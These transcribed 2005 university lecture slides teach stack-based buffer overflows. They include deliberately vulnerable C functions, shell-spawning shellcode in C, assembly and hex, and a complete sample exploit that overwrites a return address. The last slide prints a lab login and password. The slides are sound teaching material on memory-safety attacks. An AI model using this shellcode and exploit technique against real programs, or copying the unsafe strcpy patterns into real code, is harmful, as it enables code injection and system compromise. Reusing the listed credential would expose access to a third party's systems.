1. Stack-based buffer overflows Yves Younan DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium Yves.Younan@cs.kuleuven.ac.be

2. Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, 2005 - 2 Overview  Introduction  Buffer overflows  Stack-based buffer overflows  Shellcode  Code injection  Conclusion

3. Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, 2005 - 3 Introduction  Buffer overflows: write outside the boundaries of an array  Can be used to overwrite adjacent memory  The stack contains control-flow related data, e.g. return addresses  Overwriting this data allows an attacker to execute new or existing code

4. Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, 2005 - 4 Overview  Introduction  Buffer overflows  Stack-based buffer overflows  Shellcode  Code injection  Conclusion

5. Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, 2005 - 5 Buffer overflows (on IA32)  int main(int argc, char **argv) { int a; char buf[100]; strcpy(buf, argv); }  Int a is allocated on the stack: 4 bytes  Buf has memory allocated for 100 chars: 100 bytes  Argv could be larger than that, allowing an attacker to overwrite a in this example

6. Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, 2005 - 6 Buffer overflow on IA32 int a char buf[100] High addr Low addr

7. Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, 2005 - 7 Overview  Introduction  Buffer overflows  Stack-based buffer overflows  Shellcode  Code injection  Conclusion

8. Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, 2005 - 8 Stack based buffer overflows  void f1(char *a) { char buffer[100]; strcpy(buffer, a); }  void f0(char *b) { f1(b); }

9. Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, 2005 - 9 Stack frame f1 Stack-based buffer overflows f0: … … call f1 Return address f0 Stack Saved Frame Ptr f0 Local variables f0 Arguments f1 f1: buffer[] … overflow() Buffer Return address f1 Stack frame f0 Injected code Saved Frame Ptr f1 High addr

10. Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, 2005 - 10 Overview  Introduction  Buffer overflows  Stack-based buffer overflows  Shellcode  Code injection  Conclusion

11. Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, 2005 - 11 Shellcode  Code to execute once the return address has been overwritten  Usually inserted into buffer that is used to overflow  Some subtleties: a NULL will terminate an strcpy, \n will terminate gets

12. Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, 2005 - 12 Example code  #include int main() { char *argv[2]; argv[0] = "/bin/bash"; argv[1] = 0; execve(argv[0], argv, 0); }

13. Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, 2005 - 13 Example transformed to assembly .type main,@function main: push $0x68 # Place h on the stack. push $0x7361622f # Place sab/ on the stack. push $0x6e69622f # Place nib/ on the stack. mov %esp,%ebx # Copy the pointer to /bin/bash to ebx. xor %edx,%edx # Empty edx. push %edx # Place a NULL on the stack to terminate the argv. push %ebx # Place the pointer to /bin/bash on the stack. mov %esp,%ecx # Copy the pointer to the pointer to /bin/bash into ecx. mov $0xb,%eax # Let the syscall know we want execve int $0x80 # Do the system call

14. Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, 2005 - 14 Shellcode  (gdb) x/27b main  0x8048308 : 0x6a 0x68 0x68 0x2f 0x62 0x61 0x73 0x68  0x8048310 : 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x31 0xd2  0x8048318 : 0x52 0x53 0x89 0xe1 0xb8 0x0b 0x00 0x00  0x8048320 : 0x00 0xcd 0x80

15. Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, 2005 - 15 Shellcode .globl main.type main,@function main: push $0x68 push $0x7361622f push $0x6e69622f mov %esp,%ebx xor %edx,%edx push %edx push %ebx mov %esp,%ecx xor %eax,%eax # set %eax to 0 mov $0xb,%al # copy 0xb into %al (least signicant byte of %eax) int $0x80

16. Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, 2005 - 16 Overview  Introduction  Buffer overflows  Stack-based buffer overflows  Shellcode  Code injection  Conclusion

17. Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, 2005 - 17 Sample vulnerable program  void function(int a, char *b) { char string1[10]; char string2[50]; strcpy(string2,b); } int main(int argc, char **argv) { function(1,argv[1]); }

18. Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, 2005 - 18 Sample exploit  #include #include char shellcode[] = "\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89" "\xe3\x31\xd2\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80"; #define ADDR 0xbffffe2c int main() { char overflow[72]; char *argv[3] = { "./bufferoverflow", overflow, NULL }; memset(overflow,'\x90',72); // fill with NOPs *(long *) &overflow[68] = ADDR; // replace ret. addr. memcpy(overflow, shellcode, strlen(shellcode)); execve(argv[0],argv,0); // exex program }

19. Yves Younan - Methodology for Designing Countermeasures against Code injection AttacksMarch 22, 2005 - 19 Conclusion  Follow “Gera’s Insecure Programming by example” :  http://community.corest.com/~gera/InsecureProgram ming/ http://community.corest.com/~gera/InsecureProgram ming/  Login/pass for the computers: cstudy/distrinet